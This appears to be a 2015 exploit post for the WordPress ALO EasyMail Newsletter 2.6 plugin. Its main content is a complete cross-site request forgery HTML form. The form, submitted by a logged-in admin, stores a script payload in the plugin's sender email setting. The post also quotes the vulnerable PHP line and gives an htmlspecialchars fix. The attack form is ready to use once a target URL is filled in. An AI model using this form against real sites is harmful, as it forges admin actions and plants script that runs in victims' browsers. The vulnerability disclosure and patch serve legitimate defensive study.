WordPress ALO EasyMail Newsletter 2.6 CSRF / Cross Site Scripting
Posted on 17 September 2015
# Exploit Title: Wordpress ALO EasyMail Newsletter CSRF/XSS # Exploit Author: Ashiyane Digital Security Team # Vendor Homepage: https://wordpress.org/plugins/alo-easymail/ # Software Link: https://downloads.wordpress.org/plugin/alo-easymail.2.6.00.zip # Version: 2.6 # Date: 2015-09-15 # Tested on: windows 7 /FireFox #################################################### #Exploit : <form name="XSS" method="POST" action="http://[URL]/[Path]/wp-admin/edit.php?post_type=newsletter&page=alo-easymail/pages/alo-easymail-admin-options.php"> <input Type="hidden" name="lastposts" value="10" /> <input Type="hidden" name="sender_email" value='"><script>alert(/This is Xss/)</script>' /> <input Type="hidden" name="user_ID" value="1" /> <input Type="hidden" name="task" value="tab_newsletter" /> <input Type="hidden" name="submit" value="Update" /> <input type="submit" value="Submit Form" /> </form> #################################################################### # Vulnerable File : /wp-content/plugins/alo-easymail/pages/alo-easymail-admin-options.php # Vulnerable codes: Line 484 : <input type="text" name="sender_email" value="<?php echo get_option('alo_em_sender_email') ?>" id="sender_email" size="30" maxlength="100" /> ================================= For Patch XSS : Replace Line 484 With: <input type="text" name="sender_email" value="<?php echo htmlspecialchars(get_option('alo_em_sender_email')) ?>" id="sender_email" size="30" maxlength="100" /> ########################################################## discovered by : Amir.ght(Goldhack)
